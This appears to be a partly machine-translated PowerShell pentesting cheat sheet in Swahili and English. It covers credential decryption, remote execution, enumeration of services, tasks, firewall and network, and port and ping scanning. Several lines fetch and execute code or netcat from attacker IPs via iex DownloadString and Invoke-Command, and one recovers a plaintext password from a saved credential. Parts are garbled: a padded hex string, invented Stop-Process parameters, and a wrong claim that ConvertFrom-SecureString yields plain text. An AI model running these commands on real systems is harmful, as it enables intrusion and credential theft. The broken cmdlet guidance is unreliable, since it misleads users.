$secureString = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000b7c7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7
```powershell
$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | convertto-securestring
$user = "HTB\Tom"
$cred = New-Object System.management.Automation.PSCredential($user, $pass)
$cred.GetNetworkCredential() | fl
UserName : Tom
Password : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain : HTB
Au kuchambua moja kwa moja kutoka kwenye XML:
$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *
UserName : Tom
Password : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain : HTB
SUDO
SUDO ni programu inayopatikana kwenye mifumo ya Linux ambayo inaruhusu mtumiaji kutekeleza amri kama mtumiaji mwingine, kawaida mtumiaji wa mfumo wa mizizi. Hii inatoa uwezo wa kufanya kazi na mamlaka ya juu na kutekeleza amri ambazo zinahitaji ruhusa maalum.
Kwa wapenzi wa udukuzi, SUDO inaweza kuwa zana yenye nguvu. Kwa mfano, ikiwa unaweza kupata ufikiaji wa mtumiaji ambaye ana ruhusa ya kutekeleza amri fulani kupitia SUDO, unaweza kutumia hii kutekeleza amri hizo kwa niaba yake. Hii inaweza kukupa ufikiaji wa mamlaka ya juu na uwezo wa kufanya mabadiliko kwenye mfumo.
Kuna njia kadhaa za kuchunguza ikiwa mtumiaji ana ruhusa ya SUDO na ni amri gani anaweza kutekeleza kupitia SUDO. Moja ya njia hizo ni kwa kutumia amri "sudo -l". Hii itakupa orodha ya amri ambazo mtumiaji anaweza kutekeleza kupitia SUDO.
Kwa wapenzi wa udukuzi, ni muhimu kuelewa jinsi SUDO inavyofanya kazi na jinsi ya kuitumia kwa ufanisi. Kwa kufanya hivyo, unaweza kupata ufikiaji wa mamlaka ya juu na kufanya udukuzi wa kina kwenye mfumo.
#CREATE A CREDENTIAL OBJECT
$pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("<USERNAME>", $pass)
#For local:
Start-Process -Credential ($cred) -NoNewWindow powershell "iex (New-Object Net.WebClient).DownloadString('http://10.10.14.11:443/ipst.ps1')"
#For WINRM
#CHECK IF CREDENTIALS ARE WORKING EXECUTING whoami (expected: username of the credentials user)
Invoke-Command -Computer ARKHAM -ScriptBlock { whoami } -Credential $cred
#DOWNLOAD nc.exe
Invoke-Command -Computer ARKHAM -ScriptBlock { IWR -uri 10.10.14.17/nc.exe -outfile nc.exe } -credential $cred
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process C:\xyz\nc.bat -verb Runas}'
#Another method
$secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
$computer = "<hostname>"
Vikundi
Vikundi ni njia muhimu ya kusimamia na kusimamia ufikiaji wa watumiaji kwenye mfumo wa Windows. Kwa kutumia vikundi, unaweza kuweka ruhusa na vizuizi kwa watumiaji na vifaa vyao. Hii ni muhimu sana katika kuhakikisha usalama wa mfumo wako.
Vikundi vya Kujengwa
Windows ina vikundi vingi vya kujengwa ambavyo tayari vipo kwenye mfumo wako. Vikundi hivi vina majina maalum na kazi zao zilizopangwa. Baadhi ya vikundi hivi ni pamoja na:
- Administrators: Kikundi hiki kina haki kamili za usimamizi wa mfumo. Watumiaji walio kwenye kikundi hiki wanaweza kufanya mabadiliko yoyote kwenye mfumo, pamoja na kusimamia akaunti za watumiaji wengine.
- Users: Kikundi hiki ni kwa watumiaji wa kawaida. Hawana haki za usimamizi wa mfumo na wanaweza tu kufanya mabadiliko kwenye akaunti zao wenyewe.
- Guests: Kikundi hiki ni kwa watumiaji wa muda mfupi au wasiojulikana. Hawana haki za usimamizi na wanaweza tu kupata ufikiaji mdogo kwenye mfumo.
- Power Users: Kikundi hiki kina haki za juu kuliko watumiaji wa kawaida, lakini hawana haki kamili za usimamizi wa mfumo kama vile kikundi cha Administrators.
- Backup Operators: Kikundi hiki kina ruhusa za kufanya nakala rudufu na kurejesha data kwenye mfumo.
- Remote Desktop Users: Kikundi hiki kina ruhusa ya kuingia kwa mbali kwenye mfumo kupitia Desktop ya Mbali.
Vikundi vya Kibinafsi
Mbali na vikundi vya kujengwa, unaweza pia kuunda vikundi vya kibinafsi kulingana na mahitaji yako. Vikundi hivi vinaweza kuwa na majina na ruhusa maalum zilizopangwa na wewe. Unaweza kuongeza watumiaji kwenye vikundi hivi ili kudhibiti ufikiaji wao kwa rasilimali za mfumo.
Usimamizi wa Vikundi
Kwa kusimamia vikundi, unaweza kuunda, kuhariri, na kufuta vikundi. Unaweza pia kuongeza na kuondoa watumiaji kutoka kwenye vikundi. Kwa kufanya hivyo, unaweza kudhibiti ufikiaji wa watumiaji kwenye mfumo wako na kuhakikisha usalama wake.
Get-LocalGroup | ft Name #All groups
Get-LocalGroupMember Administrators | ft Name, PrincipalSource #Members of Administrators
Ubao wa Kuchora
The clipboard is a temporary storage area in the computer's memory where data can be copied or cut from one location and then pasted into another location. It is commonly used for copying and pasting text, images, and other types of data between different applications or within the same application.
In the context of PowerShell, the clipboard can be accessed and manipulated using the Get-Clipboard and Set-Clipboard cmdlets. These cmdlets allow you to retrieve the contents of the clipboard or set the contents of the clipboard with new data.
Getting the Clipboard Contents
To retrieve the contents of the clipboard, you can use the Get-Clipboard cmdlet. This cmdlet will return the data currently stored in the clipboard.
$clipboardContents = Get-Clipboard
Setting the Clipboard Contents
To set the contents of the clipboard with new data, you can use the Set-Clipboard cmdlet. This cmdlet will replace the current contents of the clipboard with the specified data.
Set-Clipboard -Value "New clipboard data"
You can also use the pipeline to set the clipboard contents. For example, you can pipe the output of a command to the Set-Clipboard cmdlet to copy the command's output to the clipboard.
Get-Process | Set-Clipboard
Clearing the Clipboard
To clear the contents of the clipboard, you can use the Clear-Clipboard cmdlet. This cmdlet will remove all data from the clipboard.
Clear-Clipboard
Conclusion
Understanding how to work with the clipboard in PowerShell can be useful for automating tasks that involve copying and pasting data. By using the Get-Clipboard and Set-Clipboard cmdlets, you can easily retrieve and manipulate the contents of the clipboard.
Get-Clipboard
Mchakato
Kuonyesha Mchakato
Unaweza kuonyesha mchakato unaofanya kazi kwenye mfumo wa Windows kwa kutumia amri ifuatayo:
Get-Process
Kuonyesha Mchakato Kwa Jina Fulani
Ili kuonyesha mchakato kwa jina fulani, tumia amri ifuatayo:
Get-Process -Name <jina_la_mchakato>
Kuonyesha Mchakato Kwa Kitambulisho cha Mchakato
Ili kuonyesha mchakato kwa kitambulisho cha mchakato, tumia amri ifuatayo:
Get-Process -Id <kitambulisho_cha_mchakato>
Kuua Mchakato
Unaweza kuua mchakato kwa kutumia amri ifuatayo:
Stop-Process -Id <kitambulisho_cha_mchakato>
Kuua Mchakato Kwa Jina Fulani
Ili kuua mchakato kwa jina fulani, tumia amri ifuatayo:
Stop-Process -Name <jina_la_mchakato>
Kuua Mchakato Kwa Jina la Mchakato na Mtumiaji
Ili kuua mchakato kwa jina la mchakato na mtumiaji, tumia amri ifuatayo:
Stop-Process -Name <jina_la_mchakato> -IncludeUserName
Kuua Mchakato Kwa Jina la Mchakato na Mtumiaji (Kwa Uthibitisho wa Kusitisha)
Ili kuua mchakato kwa jina la mchakato na mtumiaji kwa uthibitisho wa kusitisha, tumia amri ifuatayo:
Stop-Process -Name <jina_la_mchakato> -IncludeUserName -Force
Kuua Mchakato Kwa Jina la Mchakato na Mtumiaji (Kwa Uthibitisho wa Kusitisha na Kusubiri)
Ili kuua mchakato kwa jina la mchakato na mtumiaji kwa uthibitisho wa kusitisha na kusubiri, tumia amri ifuatayo:
Stop-Process -Name <jina_la_mchakato> -IncludeUserName -Force -Wait
Kuua Mchakato Kwa Jina la Mchakato na Mtumiaji (Kwa Uthibitisho wa Kusitisha na Kusubiri kwa Muda Maalum)
Ili kuua mchakato kwa jina la mchakato na mtumiaji kwa uthibitisho wa kusitisha na kusubiri kwa muda maalum, tumia amri ifuatayo:
Stop-Process -Name <jina_la_mchakato> -IncludeUserName -Force -Wait -Timeout <muda>
Kuua Mchakato Kwa Jina la Mchakato na Mtumiaji (Kwa Uthibitisho wa Kusitisha na Kusubiri kwa Muda Maalum na Kutoa Taarifa)
Ili kuua mchakato kwa jina la mchakato na mtumiaji kwa uthibitisho wa kusitisha na kusubiri kwa muda maalum na kutoa taarifa, tumia amri ifuatayo:
Stop-Process -Name <jina_la_mchakato> -IncludeUserName -Force -Wait -Timeout <muda> -PassThru
Kuua Mchakato Kwa Jina la Mchakato na Mtumiaji (Kwa Uthibitisho wa Kusitisha na Kusubiri kwa Muda Maalum na Kutoa Taarifa kwenye Faili)
Ili kuua mchakato kwa jina la mchakato na mtumiaji kwa uthibitisho wa kusitisha na kusubiri kwa muda maalum na kutoa taarifa kwenye faili, tumia amri ifuatayo:
Stop-Process -Name <jina_la_mchakato> -IncludeUserName -Force -Wait -Timeout <muda> -PassThru | Out-File <jina_la_faili>
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
Huduma
Introduction
Utangulizi
In this section, you will find information about different services that can be found in a Windows environment. Understanding these services is crucial for a pentester as they can be potential entry points for exploitation.
Katika sehemu hii, utapata habari kuhusu huduma tofauti zinazopatikana katika mazingira ya Windows. Kuelewa huduma hizi ni muhimu kwa pentester kwani zinaweza kuwa njia za kuingia kwa ajili ya uchunguzi.
Table of Contents
Orodha ya Yaliyomo
- Active Directory
- Active Directory Certificate Services
- Active Directory Federation Services
- Active Directory Lightweight Directory Services
- Active Directory Rights Management Services
- Application Host Helper Service
- Application Information
- Application Layer Gateway Service
- Application Management
- ASP.NET State Service
- Background Intelligent Transfer Service
- Base Filtering Engine
- BitLocker Drive Encryption Service
- Block Level Backup Engine Service
- Bluetooth Support Service
- BranchCache
- Certificate Propagation
- CNG Key Isolation
- COM+ Event System
- COM+ System Application
- Computer Browser
- Credential Manager
- Cryptographic Services
- Data Sharing Service
- DCOM Server Process Launcher
- Desktop Window Manager Session Manager
- DHCP Client
- DHCP Server
- Diagnostic Policy Service
- Diagnostic Service Host
- Diagnostic System Host
- Distributed Link Tracking Client
- Distributed Transaction Coordinator
- DNS Client
- DNS Server
- Encrypting File System
- Event Log
- Extensible Authentication Protocol
- Fax
- File History Service
- Function Discovery Provider Host
- Function Discovery Resource Publication
- Group Policy Client
- Health Key and Certificate Management
- HomeGroup Listener
- HomeGroup Provider
- Human Interface Device Access
- IKE and AuthIP IPsec Keying Modules
- Interactive Services Detection
- Internet Connection Sharing (ICS)
- IP Helper
- IPsec Policy Agent
- KtmRm for Distributed Transaction Coordinator
- Link-Layer Topology Discovery Mapper
- Media Center Extender Service
- Microsoft iSCSI Initiator Service
- Microsoft Software Shadow Copy Provider
- Multimedia Class Scheduler
- Netlogon
- Network Access Protection Agent
- Network Connections
- Network Connectivity Assistant
- Network List Service
- Network Location Awareness
- Network Store Interface Service
- Offline Files
- Parental Controls
- Peer Name Resolution Protocol
- Peer Networking Grouping
- Peer Networking Identity Manager
- Performance Counter DLL Host
- Performance Logs & Alerts
- Plug and Play
- PNRP Machine Name Publication Service
- PNRP Machine Name Resolution Service
- Portable Device Enumerator Service
- Power
- Print Spooler
- Problem Reports and Solutions Control Panel Support
- Program Compatibility Assistant Service
- Quality Windows Audio Video Experience
- Remote Access Auto Connection Manager
- Remote Access Connection Manager
- Remote Desktop Configuration
- Remote Desktop Services
- Remote Desktop Services UserMode Port Redirector
- Remote Procedure Call (RPC)
- Remote Procedure Call (RPC) Locator
- Remote Registry
- Routing and Remote Access
- Secondary Logon
- Secure Socket Tunneling Protocol Service
- Security Accounts Manager
- Security Center
- Server
- Shell Hardware Detection
- Simple TCP/IP Services
- Smart Card
- Smart Card Removal Policy
- SNMP Trap
- Software Protection
- SPP Notification Service
- SSDP Discovery
- Storage Service
- Superfetch
- System Event Notification Service
- Task Scheduler
- TCP/IP NetBIOS Helper
- Telephony
- Themes
- Thread Ordering Server
- TPM Base Services
- UPnP Device Host
- User Profile Service
- Virtual Disk
- Volume Shadow Copy
- WebClient
- Windows Audio
- Windows Audio Endpoint Builder
- Windows Backup
- Windows Biometric Service
- Windows CardSpace
- Windows Color System
- Windows Connect Now - Config Registrar
- Windows Defender Advanced Threat Protection
- Windows Defender Antivirus Network Inspection Service
- Windows Defender Antivirus Service
- Windows Defender Firewall
- Windows Defender Firewall Authorization Driver
- Windows Defender Firewall with Advanced Security
- Windows Deployment Services
- Windows Driver Foundation - User-mode Driver Framework
- Windows Error Reporting Service
- Windows Event Collector
- Windows Event Log
- Windows Firewall
- Windows Font Cache Service
- Windows Image Acquisition (WIA)
- Windows Installer
- Windows License Manager Service
- Windows Management Instrumentation
- Windows Media Player Network Sharing Service
- Windows Modules Installer
- Windows Presentation Foundation Font Cache 3.0.0.0
- Windows Push Notifications System Service
- Windows Remote Management (WS-Management)
- Windows Search
- Windows Time
- Windows Update
- WinHTTP Web Proxy Auto-Discovery Service
- Wired AutoConfig
- WLAN AutoConfig
- WMI Performance Adapter
- Workstation
- WWAN AutoConfig
Conclusion
Hitimisho
Understanding the different services in a Windows environment is essential for a pentester. By familiarizing yourself with these services, you can identify potential vulnerabilities and exploit them effectively.
Kuelewa huduma tofauti katika mazingira ya Windows ni muhimu kwa pentester. Kwa kuzoea huduma hizi, unaweza kutambua udhaifu unaowezekana na kuzitumia kwa ufanisi.
Get-Service
Nenosiri kutoka kwa herufi salama
To get the password from a secure string in PowerShell, you can use the ConvertFrom-SecureString cmdlet. This cmdlet converts a secure string into an encrypted standard string representation.
Here is an example of how to use it:
$secureString = Read-Host -AsSecureString
$plainText = ConvertFrom-SecureString $secureString
$plainText
In this example, the Read-Host cmdlet is used to securely input the password as a secure string. Then, the ConvertFrom-SecureString cmdlet is used to convert the secure string into a plain text representation. Finally, the plain text password is displayed.
Please note that the ConvertFrom-SecureString cmdlet will only work on the same machine and user account that encrypted the secure string.
$pw=gc admin-pass.xml | convertto-securestring #Get the securestring from the file
$cred=new-object system.management.automation.pscredential("administrator", $pw)
$cred.getnetworkcredential() | fl * #Get plaintext password
Kazi Zilizopangwa
Scheduled tasks are a powerful feature in Windows that allow you to automate the execution of scripts, programs, or commands at specific times or intervals. As a pentester, understanding how scheduled tasks work can be beneficial for privilege escalation, persistence, and lateral movement.
Kazi zilizopangwa ni kipengele cha nguvu katika Windows kinachokuwezesha kutekeleza kiotomatiki hati, programu, au amri katika nyakati au vipindi maalum. Kama mchunguzi wa usalama, kuelewa jinsi kazi zilizopangwa zinafanya kazi kunaweza kuwa na manufaa kwa kuongeza mamlaka, kudumu, na harakati za upande.
Viewing Scheduled Tasks
Kuangalia Kazi Zilizopangwa
To view the list of scheduled tasks on a Windows system, you can use the schtasks command-line tool. This tool allows you to query, create, modify, and delete scheduled tasks.
Kuongalia orodha ya kazi zilizopangwa kwenye mfumo wa Windows, unaweza kutumia zana ya amri ya schtasks. Zana hii inakuwezesha kuuliza, kuunda, kubadilisha, na kufuta kazi zilizopangwa.
To view all the scheduled tasks, open a command prompt and run the following command:
Kuona kazi zote zilizopangwa, fungua dirisha la amri na endesha amri ifuatayo:
schtasks /query /fo table
Creating Scheduled Tasks
Kuunda Kazi Zilizopangwa
To create a new scheduled task, you can use the schtasks command-line tool with the /create option. You will need administrative privileges to create a scheduled task.
Kuunda kazi mpya iliyopangwa, unaweza kutumia zana ya amri ya schtasks na chaguo la /create. Utahitaji mamlaka ya usimamizi kuunda kazi iliyopangwa.
Here is an example command to create a scheduled task that runs a PowerShell script every day at 9:00 AM:
Hapa kuna amri ya mfano ya kuunda kazi iliyopangwa ambayo inatekeleza hati ya PowerShell kila siku saa 9:00 asubuhi:
schtasks /create /tn "MyTask" /tr "powershell.exe -ExecutionPolicy Bypass -File C:\path\to\script.ps1" /sc daily /st 09:00
Modifying Scheduled Tasks
Kubadilisha Kazi Zilizopangwa
To modify an existing scheduled task, you can use the schtasks command-line tool with the /change option. Again, administrative privileges are required to modify a scheduled task.
Kubadilisha kazi iliyopangwa iliyopo, unaweza kutumia zana ya amri ya schtasks na chaguo la /change. Tena, unahitaji mamlaka ya usimamizi kuweza kubadilisha kazi iliyopangwa.
Here is an example command to modify the schedule of an existing task to run every hour:
Hapa kuna amri ya mfano ya kubadilisha ratiba ya kazi iliyopo ili itekelezwe kila saa:
schtasks /change /tn "MyTask" /sc hourly
Deleting Scheduled Tasks
Kufuta Kazi Zilizopangwa
To delete a scheduled task, you can use the schtasks command-line tool with the /delete option. Once again, administrative privileges are required to delete a scheduled task.
Kufuta kazi iliyopangwa, unaweza kutumia zana ya amri ya schtasks na chaguo la /delete. Tena, unahitaji mamlaka ya usimamizi kuweza kufuta kazi iliyopangwa.
Here is an example command to delete a scheduled task:
Hapa kuna amri ya mfano ya kufuta kazi iliyopangwa:
schtasks /delete /tn "MyTask" /f
Remember to replace "MyTask" with the actual name of the task you want to delete.
Kumbuka kubadilisha "MyTask" na jina halisi la kazi unayotaka kufuta.
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
Uchunguzi wa Bandari
Uchunguzi wa bandari ni mchakato wa kutambua bandari zilizofunguliwa kwenye mfumo wa kompyuta au kifaa cha mtandao. Hii inaweza kufanyika kwa kutumia zana maalum za uchunguzi wa bandari kama vile Nmap.
Uchunguzi wa bandari unaweza kutoa habari muhimu kwa mtu anayefanya uchunguzi, kama vile bandari zilizofunguliwa, huduma zinazotumika kwenye bandari hizo, na hata toleo la programu inayotumika. Habari hii inaweza kutumiwa kwa madhumuni mbalimbali, ikiwa ni pamoja na kubaini udhaifu wa usalama na kutekeleza mashambulizi.
Kwa mfano, mtu anayefanya uchunguzi wa bandari anaweza kutambua bandari ya SSH iliyofunguliwa kwenye mfumo wa kompyuta. Hii inaweza kuwa hatari ikiwa mfumo huo una udhaifu wa usalama kwenye huduma ya SSH, kwani mtu anayefanya uchunguzi anaweza kujaribu kutekeleza mashambulizi kwa kutumia udhaifu huo.
Ni muhimu kwa wamiliki wa mfumo na watendaji wa usalama kufanya uchunguzi wa mara kwa mara wa bandari kwenye mifumo yao ili kugundua na kurekebisha udhaifu wa usalama kabla ya kutokea shambulio.
# Check Port or Single IP
Test-NetConnection -Port 80 10.10.10.10
# Check Port List in Single IP
80,443,8080 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.10.10.10",$_)) "Port $_ is open!"} 2>$null
# Check Port Range in single IP
1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("10.10.10.10", $_)) "TCP port $_ is open"} 2>$null
# Check Port List in IP Lists - 80,443,445,8080
"10.10.10.10","10.10.10.11" | % { $a = $_; write-host "[INFO] Testing $_ ..."; 80,443,445,8080 | % {echo ((new-object Net.Sockets.TcpClient).Connect("$a",$_)) "$a : $_ is open!"} 2>$null}
Violezo
Violezo ni njia ambayo programu inaweza kuwasiliana na mfumo wa uendeshaji au programu nyingine. Katika mazingira ya PowerShell, kuna aina mbili za violezo: violezo vya amri na violezo vya kitu.
Violezo vya Amri
Violezo vya amri ni njia ya kutekeleza amri za PowerShell. Wanaweza kufanya kazi kama amri za kawaida za PowerShell au kama amri za kawaida za mfumo wa uendeshaji. Violezo vya amri vinaweza kufanywa kwa kutumia amri ya Invoke-Expression au kwa kutumia alama ya ampersand (&) kabla ya amri.
Violezo vya Kitu
Violezo vya kitu ni njia ya kufikia mali na vitendo vya kitu fulani. Wanaweza kutumiwa kufanya vitendo kwenye vitu kama vile faili, saraka, au vitu vingine vya mfumo wa uendeshaji. Violezo vya kitu vinaweza kufanywa kwa kutumia alama ya dot (.) baada ya jina la kitu na kisha jina la mali au kitendo.
Kupata Violezo
Kuna njia kadhaa za kupata violezo katika PowerShell. Baadhi ya njia hizo ni:
- Kupata violezo vilivyopo: Unaweza kutumia amri ya
Get-Commandili kupata orodha ya violezo vyote vilivyopo katika mfumo wako. - Kupata maelezo ya violezo: Unaweza kutumia amri ya
Get-Helpili kupata maelezo na mifano ya matumizi ya violezo fulani. - Kupata violezo vya kitu: Unaweza kutumia amri ya
Get-Memberili kupata orodha ya violezo vya kitu fulani na maelezo ya mali na vitendo vinavyopatikana.
Kutumia Violezo
Kutumia violezo katika PowerShell ni rahisi. Unaweza kutumia violezo vya amri kwa kutekeleza amri za PowerShell au amri za mfumo wa uendeshaji. Unaweza kutumia violezo vya kitu kufanya vitendo kwenye vitu fulani kama vile kusoma au kuandika faili.
Kwa mfano, unaweza kutumia violezo vya amri kutekeleza amri ya Get-Process ili kupata mchakato unaofanya kazi kwenye mfumo wako. Unaweza pia kutumia violezo vya kitu kusoma mali ya faili kama vile jina la faili, ukubwa, au tarehe ya kubadilishwa.
Hitimisho
Violezo ni sehemu muhimu ya PowerShell na wanaweza kukusaidia kufanya kazi kwa ufanisi na mfumo wa uendeshaji. Kwa kujifunza jinsi ya kutumia violezo, unaweza kuwa na uwezo wa kufanya kazi kwa ufanisi zaidi na kufikia malengo yako katika uwanja wa udukuzi wa mtandao.
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
Firewall
Kizuizi cha Moto
Firewalls are an essential component of network security. They act as a barrier between a trusted internal network and an untrusted external network, filtering incoming and outgoing network traffic based on predefined rules. Firewalls can be implemented in both hardware and software forms.
Kizuizi cha moto ni sehemu muhimu ya usalama wa mtandao. Inafanya kazi kama kizuizi kati ya mtandao wa ndani unaouaminika na mtandao wa nje usioaminika, kwa kuchuja trafiki ya mtandao ya kuingia na kutoka kulingana na sheria zilizowekwa mapema. Kizuizi cha moto kinaweza kutekelezwa kwa njia ya vifaa au programu.
Get-NetFirewallRule -Enabled True
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Allow
Get-NetFirewallRule -Direction Inbound -Enabled True -Action Block
Get-NetFirewallRule -Direction Inbound -Enabled True -Action Allow
# Open SSH to the world
New-NetFirewallRule -DisplayName 'SSH (Port 22)' -Direction Inbound -LocalPort 22 -Protocol TCP -Action Allow
# Get name, proto, local and rremote ports, remote address, penable,profile and direction
## You can user the following line changing the initial filters to indicat a difefrent direction or action
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block | Format-Table -Property DisplayName, @{Name='Protocol';Expression={($PSItem | Get-NetFirewallPortFilter).Protocol}},@{Name='LocalPort';Expression={($PSItem | Get-NetFirewallPortFilter).LocalPort}}, @{Name='RemotePort';Expression={($PSItem | Get-NetFirewallPortFilter).RemotePort}},@{Name='RemoteAddress';Expression={($PSItem | Get-NetFirewallAddressFilter).RemoteAddress}},Profile,Direction,Action
Njia
Route ni amri ya PowerShell ambayo inaruhusu mtumiaji kuona na kubadilisha meza ya kusambaza ya mfumo wa uendeshaji. Inatoa habari kuhusu njia za kusambaza zilizopo na inaruhusu mtumiaji kuongeza, kubadilisha au kuondoa njia hizo.
Amri ya kawaida ya Route ni:
route [-f] [-p] [Command]
Maelezo ya kila kipengele cha amri:
-f: Inafuta njia zote za kusambaza zilizopo.-p: Inafanya mabadiliko kuwa ya kudumu (persistent) baada ya kuanza upya mfumo.Command: Inaonyesha amri ya kusambaza iliyotumika.
Kwa mfano, amri ifuatayo inaonyesha njia za kusambaza zilizopo:
route print
Amri ifuatayo inaongeza njia ya kusambaza:
route add [Destination] [Mask] [Gateway]
Kwa mfano, amri ifuatayo inaongeza njia ya kusambaza kwa anwani ya IP 192.168.1.0 na maski ya 255.255.255.0 kupitia lango la 192.168.0.1:
route add 192.168.1.0 mask 255.255.255.0 192.168.0.1
Amri ifuatayo inaondoa njia ya kusambaza:
route delete [Destination]
Kwa mfano, amri ifuatayo inaondoa njia ya kusambaza kwa anwani ya IP 192.168.1.0:
route delete 192.168.1.0
Amri ya Route ni muhimu kwa wapenzi wa pentesting kwa sababu inaweza kutumiwa kubadilisha njia za kusambaza na kuelekeza trafiki kwa njia zisizotarajiwa.
route print
ARP
ARP (Address Resolution Protocol) ni itifaki ya mtandao inayotumiwa kubadilishana anwani za MAC (Media Access Control) kati ya anwani za IP. Inaruhusu vifaa kwenye mtandao kutambua anwani za MAC za vifaa vingine ili kuwasiliana nao moja kwa moja.
Katika muktadha wa udukuzi, ARP inaweza kutumiwa kwa njia mbalimbali, kama vile:
- ARP Spoofing: Kudanganya vifaa vingine kwenye mtandao kwa kubadilisha anwani za MAC zinazohusiana na anwani za IP.
- ARP Cache Poisoning: Kuingiza anwani za MAC zisizo sahihi kwenye cache ya ARP ya kifaa, ili kudanganya mawasiliano kati ya vifaa.
- ARP Redirect: Kurekebisha mwelekeo wa trafiki kwenye mtandao kwa kubadilisha anwani za MAC zinazohusiana na anwani za IP.
Kuelewa jinsi ARP inavyofanya kazi na jinsi inavyoweza kudukuliwa ni muhimu kwa wapenzi wa udukuzi ili kuboresha ujuzi wao na kuchunguza udhaifu katika mtandao.
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
Wenyewe
Wenyeji
Get-Content C:\WINDOWS\System32\drivers\etc\hosts
Ping
Ping ni amri ya msingi ya mtandao ambayo hutumiwa kuangalia uhusiano kati ya kompyuta na kifaa kingine cha mtandao. Inatumia itifaki ya ICMP (Internet Control Message Protocol) kutuma pakiti za ujumbe kwenye kifaa kingine na kupokea majibu. Ping inaweza kutumiwa kwa madhumuni mbalimbali, kama vile kuangalia upatikanaji wa mtandao, kuchunguza kasi ya mzunguko wa mtandao, au kugundua vifaa vilivyopo kwenye mtandao.
Kwa kawaida, amri ya ping inatumia anwani ya IP ya kifaa kingine kama parameter. Kwa mfano, ping 192.168.1.1 itatuma pakiti za ujumbe kwenye kifaa chenye anwani ya IP 192.168.1.1 na kusubiri majibu. Majibu yanayopokelewa yanaonyesha ikiwa kifaa kingine kimefikika au la.
Ping pia inaweza kutumiwa kwa madhumuni ya uchunguzi wa usalama. Kwa mfano, unaweza kutumia ping kugundua ikiwa kuna vifaa vya mtandao ambavyo havionekani kwenye orodha ya vifaa vilivyosajiliwa. Hii inaweza kuonyesha uwepo wa vifaa visivyoruhusiwa au visivyojulikana kwenye mtandao.
Amri ya ping inapatikana kwenye mifumo mingi ya uendeshaji, ikiwa ni pamoja na Windows, Linux, na macOS.
$ping = New-Object System.Net.Networkinformation.Ping
1..254 | % { $ping.send("10.9.15.$_") | select address, status }
SNMP
SNMP (Simple Network Management Protocol) ni itifaki ya mtandao inayotumiwa kwa usimamizi wa vifaa vya mtandao. Inaruhusu watumiaji kufuatilia na kudhibiti vifaa vya mtandao kwa njia ya kijijini. SNMP inatumia mifano ya data inayoitwa MIBs (Management Information Bases) kuwezesha ufuatiliaji na udhibiti wa vifaa.
Kuna aina tatu za ujumbe wa SNMP:
- Ujumbe wa kufanya kazi (GetRequest): Hutumiwa kupata habari kutoka kwa kifaa cha mtandao.
- Ujumbe wa kuweka (SetRequest): Hutumiwa kubadilisha au kuweka mipangilio kwenye kifaa cha mtandao.
- Ujumbe wa taarifa (Trap): Hutumiwa na kifaa cha mtandao kutuma taarifa kwa mfumo wa usimamizi wa mtandao wakati wa tukio fulani.
SNMP inatumia vifungu vya usalama kama vile vifungu vya jamii (community strings) kudhibiti ufikiaji wa vifaa vya mtandao. Kwa hivyo, ni muhimu kwa wapentesta kuchunguza na kuchunguza vifungu vya usalama vilivyowekwa kwenye vifaa vya mtandao ili kubaini udhaifu wowote ambao unaweza kutumiwa kwa faida yao.
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
Kubadilisha SDDL String kuwa muundo unaoeleweka
To convert the SDDL string into a readable format, you can use the ConvertFrom-SddlString cmdlet in PowerShell. This cmdlet allows you to convert the Security Descriptor Definition Language (SDDL) string into an object that can be easily understood.
$sddlString = "SDDL_STRING_HERE"
$securityDescriptor = ConvertFrom-SddlString -Sddl $sddlString
$securityDescriptor
Replace SDDL_STRING_HERE with the actual SDDL string you want to convert. After running the above code, the PowerShell console will display the converted security descriptor object, which provides a more readable representation of the SDDL string.
By converting the SDDL string into a readable format, you can better understand the permissions and access control settings associated with a particular object or resource. This can be useful for analyzing security configurations and troubleshooting access-related issues.
